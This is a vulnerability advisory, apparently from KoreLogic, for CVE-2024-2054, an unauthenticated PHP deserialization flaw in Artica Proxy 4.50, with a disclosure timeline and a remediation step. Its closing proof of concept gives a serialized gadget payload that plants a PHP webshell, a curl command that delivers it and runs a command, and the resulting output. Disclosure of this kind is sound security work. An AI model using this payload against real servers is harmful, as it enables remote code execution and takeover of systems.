Artica Proxy Unauthenticated PHP Deserialization Vulnerability

Vulnerability Details

Affected Vendor: Artica
Affected Product: Artica Proxy
Affected Version: 4.50
Platform: Debian 10 LTS
CWE Classification: CWE-502 Deserialization of Untrusted Data
CVE ID: CVE-2024-2054

Vulnerability Description

The Artica Proxy administrative web application will deserialize
arbitrary PHP objects supplied by unauthenticated users and
subsequently enable code execution as the “www-data” user.

Technical Description

Prior to authentication, a user can send an HTTP request
to the “/wizard/wiz.wizard.progress.php” endpoint. This
endpoint processes the “build-js” query parameter by base64
decoding the provided value and then calling the “unserialize”
PHP function with the decoded value as input.

Code snippet from “wiz.wizard.progress.php”:

if(isset($_GET["build-js"])){buildjs();exit;} 
...
$ARRAY=unserialize(base64_decode($_GET["build-js"]));

To exploit this vulnerability, a user can leverage the
installed “Net_DNS2” library autoloader to instantiate the
“Net_DNS2_Cache_File” class. The “__destruct” method
within this class will write to arbitrary files defined
by the class:

public function __destruct()
{
    //
    // if there's no cache file set, then there's nothing to do
    //
    if (strlen($this->cache_file) == 0) {
        return;
    }

    //
    // open the file for reading/writing
    //
    $fp = fopen($this->cache_file, 'a+');
    if ($fp !== false) {
    ...
    if (!is_null($data)) {

        //
        // write the file contents
        //
        fwrite($fp, $data);
    }

An unauthenticated user can overwrite existing files and
insert a webshell to execute malicious PHP as the “www-data”
user.

Mitigation and Remediation Recommendation

No response from vendor. This vulnerability can be remediated
by deleting the ‘usr/share/artica-postfix/wizard’ directory
if it is not needed. Otherwise, move it to a location outside
of the web root.

Credit

This vulnerability was discovered by Jaggar Henry of KoreLogic,
Inc.

Disclosure Timeline

2023.12.18 - KoreLogic requests vulnerability contact and
secure communication method from Artica.
2023.12.18 - Artica Support issues automated ticket #1703011342
promising follow-up from a human.
2024.01.10 - KoreLogic again requests vulnerability contact and
secure communication method from Artica.
2024.01.10 - KoreLogic mail daemon receives SMTP 554 5.7.1 from
mail.articatech.com with response
“Client host rejected: Go Away!”
2024.01.11 - KoreLogic requests vulnerability contact and
secure communication method via
https://www.articatech.com/ ‘Contact Us’ web form.
2024.01.23 - KoreLogic requests CVE from MITRE.
2024.01.23 - MITRE issues automated ticket #1591692 promising
follow-up from a human.
2024.02.01 - 30 business days have elapsed since KoreLogic
attempted to contact the vendor.
2024.02.06 - KoreLogic requests update on CVE from MITRE.
2024.02.15 - KoreLogic requests update on CVE from MITRE.
2024.02.22 - KoreLogic reaches out to alternate CNA for
CVE identifiers.
2024.02.26 - 45 business days have elapsed since KoreLogic
attempted to contact the vendor.
2024.02.29 - Vulnerability details presented to AHA!
(takeonme.org) by proxy.
2024.03.01 - AHA! issues CVE-2024-2054 to track this
vulnerability.
2024.03.05 - KoreLogic public disclosure.

Proof of Concept

To overwrite the “wiz.upload.php” file to contain a PHP
webshell, the following serialized object can be base64
encoded and submitted via the “build-js” query parameter:

O:19:"Net_DNS2_Cache_File":4:{s:10:"cache_file";s:47:"/usr/share/artica-postfix/wizard/wiz.upload.php";s:16:"cache_serializer";s:4:"json";s:10:"cache_size";i:9999999999;s:10:"cache_data";a:1:{s:30:"<?php system($_GET['cmd']); ?>";a:2:{s:10:"cache_date";i:0;s:3:"ttl";i:9999999999;}}}

$ ARTICA_URL="https://127.0.0.1:9000"; PAYLOAD_CMD="id"; curl -k "$ARTICA_URL/wizard/wiz.wizard.progress.php?build-js=TzoxOToiTmV0X0ROUzJfQ2FjaGVfRmlsZSI6NDp7czoxMDoiY2FjaGVfZmlsZSI7czo0NzoiL3Vzci9zaGFyZS9hcnRpY2EtcG9zdGZpeC93aXphcmQvd2l6LnVwbG9hZC5waHAiO3M6MTY6ImNhY2hlX3NlcmlhbGl6ZXIiO3M6NDoianNvbiI7czoxMDoiY2FjaGVfc2l6ZSI7aTo5OTk5OTk5OTk5O3M6MTA6ImNhY2hlX2RhdGEiO2E6MTp7czozMDoiPD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8%2bIjthOjI6e3M6MTA6ImNhY2hlX2RhdGUiO2k6MDtzOjM6InR0bCI7aTo5OTk5OTk5OTk5O319fQ%3d%3d" && curl -k "$ARTICA_URL/wizard/wiz.upload.php?cmd=$PAYLOAD_CMD";

{"uid=33(www-data) gid=33(www-data) groups=33(www-data)
":{“cache_date”:1696883506,“ttl”:8303116493}}